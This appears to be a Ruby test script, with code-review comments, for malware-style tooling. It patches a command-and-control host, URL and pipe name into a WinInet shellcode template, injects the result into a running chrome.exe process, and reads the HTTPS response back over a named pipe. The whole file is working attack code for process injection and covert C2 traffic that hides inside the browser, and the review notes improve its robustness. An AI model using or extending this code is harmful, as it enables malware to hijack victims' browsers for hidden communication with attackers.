WinInet Shellcode Pipe Test
require 'win32/pipe'
require 'timeout'
require 'injector'
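# Patch the pipe name, request path and host into the WinInet shellcode
# template held in @https_pipe_code and append the request body.
#
# The template must contain three marker strings that are overwritten in
# place: "\\.\pipe\fooo" (13 bytes) for the pipe path, "/12345" (6 bytes)
# for the URL and "hostname" (8 bytes) for the host. All three offsets are
# located on the untouched template before anything is written, and the
# writes happen in the original order (url, host, pipe). A missing marker
# raises ArgumentError with the marker's name instead of the bare
# NoMethodError-on-nil the original produced.
#
# cnc_host - value written over the "hostname" marker
# url      - value written over the "/12345" marker; when shorter than the
#            marker, six NUL bytes are appended first (the original
#            behaviour; this pads *past* the marker, not up to it, so the
#            trailing NULs land in whatever bytes follow the marker)
# params   - request body appended after the shellcode; "\x00" when empty
# pipe     - bare pipe name, expanded to "\\.\pipe\<pipe>"
#
# Returns a new BINARY-encoded String; @https_pipe_code is not modified.
#
# NOTE(review): there is no bounds check — a value longer than its marker
# (plus whatever padding the template reserves behind it) silently
# overwrites the following shellcode bytes. Confirm the reserved space in
# https_shellcode.bin before passing hosts/paths longer than the markers.
def update_https_code(cnc_host, url, params, pipe)
  pipe = "\\\\.\\pipe\\#{pipe}"
  url = "#{url}\x00\x00\x00\x00\x00\x00" if url.length < 6
  params = "\x00" if params.empty?

  # Work on a BINARY copy: the template is raw machine code, and a
  # UTF-8-tagged String (e.g. from File.read) containing invalid byte
  # sequences makes =~ / index raise "invalid byte sequence in UTF-8".
  code = @https_pipe_code.dup.force_encoding(Encoding::BINARY)

  find = lambda do |marker|
    code.index(marker) || raise(ArgumentError, "shellcode template lacks marker #{marker.inspect}")
  end
  # Resolve every offset before writing, as the original did, so an
  # earlier write cannot shift or destroy a later marker.
  pipe_offset = find.call("\\\\.\\pipe\\fooo")
  url_offset  = find.call('/12345')
  host_offset = find.call('hostname')

  # Slice assignment of exactly value.bytesize bytes is equivalent to the
  # original byte-by-byte copy; the order (url, host, pipe) is preserved.
  [[url_offset, url], [host_offset, cnc_host], [pipe_offset, pipe]].each do |offset, value|
    bytes = value.dup.force_encoding(Encoding::BINARY)
    code[offset, bytes.bytesize] = bytes
  end

  code << params.dup.force_encoding(Encoding::BINARY)
end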
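# Perform one HTTPS request through the WinInet shellcode stub injected
# into chrome.exe and return whatever the stub writes back over a named
# pipe.
#
# Flow: pick a 4-letter pipe name, patch it (with host/url/params) into
# the shellcode template, inject the result into chrome.exe, then run a
# named-pipe server in a thread that accumulates the stub's output until
# "</html>" is seen or 60 seconds elapse.
#
# cnc_host - forwarded to update_https_code (host marker)
# url      - forwarded to update_https_code (URL marker)
# params   - forwarded to update_https_code (request body)
#
# Returns the bytes read from the pipe as a BINARY String (so a response
# with non-UTF-8 bytes cannot make the "</html>" regex raise). Raises
# Timeout::Error if the reader has not finished after 60 s. Unlike the
# original, the reader thread is killed and the pipe handle closed on
# every exit path; the original skipped Thread.kill when the timeout
# fired and left both leaking.
#
# NOTE(review): the pipe server is created in a thread started *after*
# inject(); if the injected stub connects before CreateNamedPipe has run
# it will fail unless the shellcode retries — confirm against the stub,
# or create the server before injecting.
# NOTE(review): a 4-letter alphabetic pipe name is guessable and no
# security descriptor or FILE_FLAG_FIRST_PIPE_INSTANCE is passed, so
# another local principal may be able to pre-create (squat) the name or
# connect to it. Nothing authenticates the data; treat it as untrusted.
def do_req(cnc_host, url, params)
  pipe = random_alpha(4)
  code = update_https_code(cnc_host, url, params, pipe)
  inject('chrome.exe', code)
  data = ''.force_encoding(Encoding::BINARY)
  @t = Thread.start do
    pserver = nil
    begin
      pserver = Win32::Pipe::Server.new(pipe,
        (Win32::Pipe::PIPE_TYPE_BYTE |
         Win32::Pipe::PIPE_READMODE_BYTE |
         Win32::Pipe::PIPE_NOWAIT),
        (Win32::Pipe::ACCESS_INBOUND |
         Win32::Pipe::FILE_FLAG_OVERLAPPED))
      pserver.connect
      # Non-blocking read: poll until the closing tag arrives. A response
      # that never contains "</html>" relies on the 60 s timeout below.
      until data =~ /<\/html>/i
        sleep 0.1
        data << pserver.buffer.dup.force_encoding(Encoding::BINARY) if pserver.read
      end
    ensure
      # Runs on normal exit and when the thread is killed by the timeout.
      pserver.close if pserver
    end
  end
  begin
    Timeout.timeout(60) { @t.join }
  ensure
    @t.kill
  end
  data
end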
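# Load the WinInet HTTPS stub. binread tags the bytes BINARY; a plain
# File.read would tag arbitrary machine code with the default external
# encoding (usually UTF-8), and the marker search in update_https_code
# would then raise "invalid byte sequence in UTF-8".
@https_pipe_code = File.binread('https_shellcode.bin')
# Smoke test: one request via the injected stub.
# NOTE(review): the first argument is 22 bytes but lands on the 8-byte
# "hostname" marker, and "/search" is 7 bytes over the 6-byte URL marker;
# confirm https_shellcode.bin reserves room behind both markers (and
# whether it expects a bare host or a full URL) before relying on this.
puts do_req("https://www.google.com", "/search", "q=lolcat")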